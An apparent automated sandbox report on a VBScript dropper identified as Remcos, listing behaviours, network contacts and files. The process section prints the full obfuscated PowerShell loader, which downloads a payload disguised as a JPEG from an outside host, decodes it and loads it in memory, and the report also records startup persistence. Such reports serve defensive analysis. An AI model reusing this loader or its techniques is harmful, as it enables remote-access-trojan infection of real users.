Analysis Overview
SHA256
e0ad36136960203db1aea53780b49ef2c819ad31d68980822c4dff0d8dab1a14
Threat Level: Known bad
The file envifa.vbs was found to be: Known bad.
Malicious Activity Summary
Remcos
Blocklisted process makes network request
Checks computer location settings
Drops startup file
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-07 14:39
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-07 14:39
Reported
2023-12-07 14:41
Platform
win7-20231020-en
Max time kernel
121s
Max time network
124s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2028 wrote to memory of 2140 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2140 wrote to memory of 2704 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '[encoded payload removed]';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('WOQNgdNPWgDJDs','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((VArIablE '*mdR*').NAmE[3,11,2]-JOin'')(('Z1qima'+'geUrl = 9glhttps://uploaddeimagens.'+'c'+'om.br/images/004/682/796/original/dll.jpg?17017939659gl;Z1qwebClient = New-Objec'+'t System.N'+'et.WebC'+'lient;Z1qimageBytes = Z'+'1qwebClient.DownloadData(Z1qimageUrl);Z1qimageText = [System.Text.Encoding]::UTF8.G'+'etString(Z1qimageBytes);Z1qstartFlag = 9gl<<BASE64_START>>9gl;Z1qendFlag = 9g'+'l<<BASE64_END>>9gl;Z1qstar'+'tIndex = Z1q'+'imageText.IndexOf(Z1qstartFlag);Z1qendIndex = Z1qimageTex'+'t.IndexOf(Z1qendFlag);Z1qstartIndex -ge 0 -and Z1qendIndex -gt Z'+'1'+'qstartIndex;Z1qstartIndex += Z1qstartFlag.Length;Z1q'+'base64Length = Z1qendIndex '+'- Z1qstartInde'+'x;Z1qbase64Command = Z1qimageText.Substr'+'ing(Z1qstartIndex, Z1qbase6'+'4Length);Z'+'1qcommandB'+'ytes = [System.Convert]'+'::'+'F'+'romBase64String(Z1qbase64Command);Z1qloadedAssembly'+' = [System.R'+'eflection.Assembly]::Load(Z1qcommandBytes);Z1qtype = Z1qloadedAssem'+'bly.GetType(9glClassLibrary3.Class19gl);Z'+'1qm'+'ethod = Z1qtype.GetMethod(9glRun9gl).Inv'+'oke('+'Z1qnull,'+' [object[]] (9glJjBhYmMzYjcwMjM1NjQxM2JlNzAyYTg5NjA0ZWVkMjk3YjdjZjI4Yzg0MGI1NjY2NDk1YjMxMGYxMD'+'E3N2UwZWE9bWgmNjc1O'+'DA3NTY9'+'c2kmNjdhZjI4NT'+'Y9e'+'GU/dHh0LmlpaWlzc29jbWVyLzM2MjM5MTA5MzIzODU2OTE4MTEvMDUxODYxMTI0MjQ1NTY5MTgxMS9zdG5lbWhjYXR0YS9tb2MucHBhZHJvY3NpZC5uZGMvLzpzc'+'HR0aA==9gl , 9gl9gl , 9gl29gl , 9glgoogle9gl , 9gl39gl , 9glC:rBAProgramDatarBA9gl, 9glgoogle9gl))').RepLAcE('9gl',[sTriNG][CHAr]39).RepLAcE('Z1q',[sTriNG][CHAr]36).RepLAcE(([CHAr]114+[CHAr]66+[CHAr]65),'\') )"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 188.114.96.0:443 | uploaddeimagens.com.br | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 2.19.194.249:80 | apps.identrust.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UTS45R3XG73OWG8A6CR7.temp
C:\Users\Admin\AppData\Local\Temp\Cab5830.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\Local\Temp\Tar597F.tmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-07 14:39
Reported
2023-12-07 14:41
Platform
win10v2004-20231127-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3840 set thread context of 3904 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '[encoded payload removed]';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('WOQNgdNPWgDJDs','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((VArIablE '*mdR*').NAmE[3,11,2]-JOin'')(('Z1qima'+'geUrl = 9glhttps://uploaddeimagens.'+'c'+'om.br/images/004/682/796/original/dll.jpg?17017939659gl;Z1qwebClient = New-Objec'+'t System.N'+'et.WebC'+'lient;Z1qimageBytes = Z'+'1qwebClient.DownloadData(Z1qimageUrl);Z1qimageText = [System.Text.Encoding]::UTF8.G'+'etString(Z1qimageBytes);Z1qstartFlag = 9gl<<BASE64_START>>9gl;Z1qendFlag = 9g'+'l<<BASE64_END>>9gl;Z1qstar'+'tIndex = Z1q'+'imageText.IndexOf(Z1qstartFlag);Z1qendIndex = Z1qimageTex'+'t.IndexOf(Z1qendFlag);Z1qstartIndex -ge 0 -and Z1qendIndex -gt Z'+'1'+'qstartIndex;Z1qstartIndex += Z1qstartFlag.Length;Z1q'+'base64Length = Z1qendIndex '+'- Z1qstartInde'+'x;Z1qbase64Command = Z1qimageText.Substr'+'ing(Z1qstartIndex, Z1qbase6'+'4Length);Z'+'1qcommandB'+'ytes = [System.Convert]'+'::'+'F'+'romBase64String(Z1qbase64Command);Z1qloadedAssembly'+' = [System.R'+'eflection.Assembly]::Load(Z1qcommandBytes);Z1qtype = Z1qloadedAssem'+'bly.GetType(9glClassLibrary3.Class19gl);Z'+'1qm'+'ethod = Z1qtype.GetMethod(9glRun9gl).Inv'+'oke('+'Z1qnull,'+' [object[]] (9glJjBhYmMzYjcwMjM1NjQxM2JlNzAyYTg5NjA0ZWVkMjk3YjdjZjI4Yzg0MGI1NjY2NDk1YjMxMGYxMD'+'E3N2UwZWE9bWgmNjc1O'+'DA3NTY9'+'c2kmNjdhZjI4NT'+'Y9e'+'GU/dHh0LmlpaWlzc29jbWVyLzM2MjM5MTA5MzIzODU2OTE4MTEvMDUxODYxMTI0MjQ1NTY5MTgxMS9zdG5lbWhjYXR0YS9tb2MucHBhZHJvY3NpZC5uZGMvLzpzc'+'HR0aA==9gl , 9gl9gl , 9gl29gl , 9glgoogle9gl , 9gl39gl , 9glC:rBAProgramDatarBA9gl, 9glgoogle9gl))').RepLAcE('9gl',[sTriNG][CHAr]39).RepLAcE('Z1q',[sTriNG][CHAr]36).RepLAcE(([CHAr]114+[CHAr]66+[CHAr]65),'\') )"
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xer3j24.y23.ps1
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\ProgramData\remcos\registros.dat